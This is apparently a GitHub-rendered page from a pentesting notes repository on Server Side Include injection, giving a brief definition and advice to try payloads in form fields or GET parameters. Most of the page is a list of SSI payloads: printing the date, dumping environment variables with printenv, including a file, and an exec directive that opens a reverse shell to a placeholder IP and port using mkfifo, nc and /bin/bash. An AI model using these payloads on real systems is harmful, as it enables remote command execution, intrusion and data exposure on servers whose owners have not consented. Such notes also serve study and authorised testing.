Skip to content

Latest commit

 

History

History
31 lines (24 loc) · 807 Bytes

Server Side Include Injection.md

File metadata and controls

31 lines (24 loc) · 807 Bytes

Server Side Include Injection (SSI Injection)

Introduction

SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive

Where to find

Usually it can be found anywhere. Just try to input the payload in the form or GET parameter

How to exploit

  1. Print a date
<!--#echo var="DATE_LOCAL" -->
  1. Print all the variabels
<!--#printenv -->
  1. Include a file
<!--#include file="includefile.html" -->
  1. Doing a reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

References